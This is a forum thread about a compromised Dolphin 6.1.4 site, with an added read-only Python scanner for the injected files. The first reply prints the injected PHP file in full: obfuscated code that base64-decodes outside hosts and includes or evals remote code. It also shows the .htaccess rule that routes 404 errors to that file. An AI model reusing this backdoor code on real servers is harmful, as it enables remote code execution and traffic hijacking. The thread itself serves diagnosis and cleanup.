
hozkarcr
Any ideas about this hack in 6.1.4...?
Comments
iced | 39 days ago

This should help everyone read your post a bit better...

"I believe our Dolphin site has been compromised. Now, every one of these directories contains a number-only PHP file containing the following code, and two lines are added to the .htaccess in that directory.

Example file: /public_html/media/images/profile/982/71029.php:

```php
<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6fe7651e1fb1f4ca0797b05d8a8f9581") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};
?>
```

/public_html/media/images/profile/982/.htaccess:

```
Options -MultiViews
ErrorDocument 404 //media/images/profile/982/71029.php
```

Any insights?"
mscott(positive) | 38 days ago

This hack is all over the internet... the .htaccess file redirects whenever someone tries to go to a page on your site that doesn't exist to the PHP file. Then the PHP file sends them to their own website. The hackers are posting links all over the internet as we speak to pages that don't exist on your site... so when someone clicks it they will be redirected to their own site. Here is my blog from when it happened to me months ago. You need to delete those files QUICK and hope Google doesn't penalize you. http://www.boonex.com/unity/blog/entry/EVERYONE_PLEASE_READ_
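A read-only check for the two traits described in this thread (a digits-only PHP file and an `ErrorDocument 404` line pointing at it), as an added example that is not from the original posts. The function names, the marker list and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Directive from the post: ErrorDocument 404 pointing at a digits-only PHP file.
ERRDOC = re.compile(r"^\s*ErrorDocument\s+404\s+(\S*/)?(\d+\.php)\s*$", re.I | re.M)
NUMERIC_PHP = re.compile(r"^\d+\.php$")
# Assumed marker list: calls the posted file uses to fetch and run remote code.
MARKERS = ("base64_decode(", "eval(", "curl_exec(", "file_get_contents(")

def scan(root):
    """Return one finding per suspect file; nothing is modified or deleted."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        hooked = set()
        if ".htaccess" in files:
            with open(os.path.join(dirpath, ".htaccess"), errors="replace") as fh:
                hooked = {m.group(2) for m in ERRDOC.finditer(fh.read())}
        for name in sorted({f for f in files if NUMERIC_PHP.match(f)} | hooked):
            path = os.path.join(dirpath, name)
            hits = []
            if os.path.isfile(path):
                with open(path, errors="replace") as fh:
                    body = fh.read()
                hits = [m for m in MARKERS if m in body]
            findings.append({"file": path, "exists": os.path.isfile(path),
                             "htaccess_404_hook": name in hooked, "markers": hits})
    return findings

def build_constructed_tree(root):
    """Constructed sample: one directory laid out as in the post, one clean one."""
    bad = os.path.join(root, "media/images/profile/982")
    ok = os.path.join(root, "media/images/profile/983")
    os.makedirs(bad)
    os.makedirs(ok)
    with open(os.path.join(bad, "71029.php"), "w") as fh:
        fh.write('<? $f=base64_decode("PLACEHOLDER"); eval($c); ?>')  # inert stand-in
    with open(os.path.join(bad, ".htaccess"), "w") as fh:
        fh.write("Options -MultiViews\nErrorDocument 404 //media/images/profile/982/71029.php\n")
    with open(os.path.join(ok, ".htaccess"), "w") as fh:
        fh.write("Options -Indexes\n")
    with open(os.path.join(ok, "index.php"), "w") as fh:
        fh.write("<?php echo 'ok'; ?>")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_tree(tmp)
        for finding in scan(tmp):
            print(finding)
```

A legitimate `404.php` error handler also matches the digits-only name pattern, so read the `markers` list before treating a finding as injected. The hooked file is assumed to sit in the same directory as its `.htaccess`, as in the post.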


































